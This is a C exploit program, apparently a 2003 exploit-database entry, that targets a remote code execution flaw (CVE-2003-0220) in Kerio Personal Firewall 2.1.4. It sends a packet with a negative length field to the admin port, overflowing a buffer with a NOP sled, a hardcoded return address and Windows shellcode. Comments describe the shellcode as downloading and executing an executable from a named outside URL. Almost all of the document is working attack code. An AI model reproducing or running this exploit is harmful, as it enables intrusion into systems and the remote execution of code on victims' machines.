Kerio Personal Firewall 2.1.4 - Remote Code Execution - CVE-2003-0220

1. /*
2.  * Kerio Personal Firewall v2.1.4 remote code execution exploit
3.  * Tested on Windows XP with SP1
4.  *
5.  * In order to exploit, for ease of mind, set the firewall to permit all traffic, or allow
6.  * a connection to port 44334 from your testing unix shell ip.
7.  *
8.  * It is also possible to use UDP instead of TCP
9.  *
10.  * It works out very well, if not, hit a few times with a ret addr of 0x41414141 to make it crash
11.  * AT THAT addr. Then use the original one, it will work. The one I used points to a 'call esp'
12.  * inside the RPCRT4.DLL.
13.  */
14.  
15. #include <stdio.h>
16. #include <stdlib.h>
17. #include <unistd.h>
18. #include <errno.h>
19. #include <string.h>
20. #include <netdb.h>
21. #include <sys/types.h>
22. #include <netinet/in.h>
23. #include <sys/socket.h>
24.  
25. #define PORT 44334 // the port client will be connecting to, default Kerio admin port
26. #define retpos 5272
27. #define MAXDATASIZE 5277 // max number of bytes we can get, also size of buffer
28.  
29. // global vars
30.  
31. struct sockaddr_in their_addr; // connector's address information
32. char buf[MAXDATASIZE];
33. int numbytes;
34.  
35. unsigned char shellcode[] =
36. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
37.  
38. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
39.  
40. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
41.   "\xEB\x30\x5F\xFC\x8B\xF7\x80"
42.  
43. "\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB2\x04\xC1"
44.  
45. "\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB2\x7C\x8B"
46.  
47. "\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF8\x8B\x40"
48.  
49. "\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0C\x03\x7D"
50.  
51. "\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8B\xF8\x33"
52.  
53. "\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7A\x03\x80"
54.  
55. "\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x51\xF3\xA6"
56.  
57. "\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC1\xE0\x02"
58.  
59. "\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x40\x3C\x03"
60.  
61. "\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF0\xAD\x03"
62.  
63. "\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xFC\x8D\x76"
64.  
65. "\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5E\x74\x06"
66.  
67. "\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0E\xEB\x02"
68.  
69. "\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5D\xFC\x8D"
70.  
71. "\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x45\xE4\xFC"
72.  
73. "\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x43\xE2\xE1"
74.  
75. "\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x53\x51\x53"
76.  
77. "\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x43\xEB\xF9"
78.  
79. "\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD4\xFF\xD0"
80.  
81. "\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xFF\xD0\x8D"
82.  
83. "\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x52\x8D\x7B"
84.  
85. "\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB6\x1F\xC1"
86.  
87. "\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8B\x45\xB4"
88.  
89. "\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xDC\xFF\xD0"
90.  
91. "\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8B\x55\xA4"
92.  
93. "\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xCC\xFF\xD0"
94.  
95. "\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6F\x64\x75"
96.  
97. "\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64"
98.  
99. "\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x4C\x6F"
100.  
101. "\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x74\x08\x5F"
102.  
103. "\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x63\x08\x5F"
104.  
105. "\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x69\x74\x50"
106.  
107. "\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6C\x08\x49"
108.  
109. "\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65"
110.  
111. "\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65"
112.  
113. "\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65"
114.  
115. "\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x65\x08"
116.   "http://reversedhell.net/hackyou.exe"
117.   "\x08\x01"; // download + exec from the net ; donno who wrote this sc
118.  
119.   //change the url to whatever, this one pops up an innofensive message box
120.  
121. // end of global vars
122.  
123. int suck(int sock,int n)
124. {
125.     int i=0,j=0,k,a=0,b=0,c=0,d=0;
126.  
127.     while (i<n)
128.     {
129.  
130.         if ((numbytes=recv(sock, buf, n, 0)) == -1) {
131.                 perror("recv");
132.                 exit(1);
133.            }
134.  
135.             if (j) i+=(numbytes-1); // ya i know i know :D
136.        
137.             else i+=numbytes;
138.  
139.             for (k=0;k<numbytes;k++) {
140.                             if (k % 10 == 0) fprintf(stderr,"\n");
141.                             if (buf[k]==0) fprintf(stderr,"    0 ");
142.                             else fprintf(stderr," %4.0d ",buf[k]);
143.                              } 
144.  
145.  
146.             fprintf(stderr,"    * ");
147.             j++;
148.             d=buf[numbytes];
149.             c=buf[numbytes-1];
150.             b=buf[numbytes-2];
151.             a=buf[numbytes-3];
152.             if ((i>200) && (a==0x1) && (b==0x0) && (c==0x1) && (d==0x0)) break;
153.         }
154.         fprintf(stderr,"\n");
155.         return i;
156. }
157.  
158.  
159.     int main(int argc, char *argv[])
160.     {
161.         int sockfd, i,j;  
162.         struct hostent *he;
163.  
164.         if (argc != 2) {
165.             fprintf(stderr,"usage: ./%s hostname\n",argv[0]);
166.             exit(1);
167.         }
168.  
169.         if ((he=gethostbyname(argv[1])) == NULL) {  // get the host info
170.             perror("gethostbyname");
171.             exit(1);
172.         }
173.  
174.         if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) { // prepare a socket for connecting
175.             perror("socket");
176.             exit(1);
177.         }
178.  
179.         their_addr.sin_family = AF_INET;    // host byte order
180.         their_addr.sin_port = htons(PORT);  // short, network byte order
181.         their_addr.sin_addr = *((struct in_addr *)he->h_addr);
182.         memset(&(their_addr.sin_zero), '\0', 8);  // zero the rest of the struct
183.  
184.         if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1) {
185.             perror("connect");
186.             exit(1);
187.         }
188.  
189.        
190.         fprintf(stderr,"shell len = %d\n",strlen(shellcode));
191.      fprintf(stderr,"Connected to firewall.\n");
192.      memset(buf,0x0,sizeof(buf));
193.      fprintf(stderr,"Sucking buffer..\n");
194.         suck(sockfd,266);
195.         fprintf(stderr,"\nBuffer ***** by black hole..\n");
196.          memset(buf,0x0,sizeof(buf));
197.          fprintf(stderr,"-------------------------------------------------\n");
198.          fprintf(stderr,"                 - BANNER -   \n");
199.          fprintf(stderr,"-------------------------------------------------\n");
200.          sleep(1);
201.      fprintf(stderr,"coded by Burebista (aanton@reversedhell.net)\n");
202.      fprintf(stderr,"           released on - 5 Apr 2003 -\n");
203.      
204.      sleep(2);
205.          fprintf(stderr,"-------------------------------------------------\n");
206.      memset(buf,0x90,MAXDATASIZE); // set nops all over
207.      
208.      // prepares call up to beginning of buffer 32 bit=5 bytes
209.      buf[MAXDATASIZE-1]='\xff'; //
210.      buf[MAXDATASIZE-2]='\xff'; // call -1150
211.      buf[MAXDATASIZE-3]='\xee'; //
212.      buf[MAXDATASIZE-4]='\xab'; //
213.      buf[MAXDATASIZE-5]='\xe8'; //
214.                            
215.      j=0;
216.                    // insert the shellcode in buf at 900
217.      for (i=900;j<strlen(shellcode);i++) buf[i]=shellcode[j++];
218.      
219.      // prepares the new return address (on XPSP1 it is CALL ESP in RPCRT4.DLL)
220.    
221.      buf[retpos-1]='\x78';
222.      buf[retpos-2]='\x07';
223.      buf[retpos-3]='\x06';
224.      buf[retpos-4]='\x90';
225.      
226.      // this prepares packet header with negative length
227.      
228.      buf[0]=0;
229.      buf[1]=0;
230.      buf[2]=0x14;
231.      buf[3]=0xffffff9c; // negative, -100. firewall will prepare
232.                               // buf of that size. signed integers hit again
233.  
234.      
235.      if ((send(sockfd, buf,sizeof(buf),0)) == -1 ) { // PASARAN!
236.         perror("send");
237.         exit(1);
238.      }
239.      fprintf(stderr,"..pasaran...\n");
240.      fprintf(stderr,":D Done!\n");
241.      
242.         close(sockfd);
243.        }
244.  
245.  
246. // milw0rm.com [2003-05-08]
247.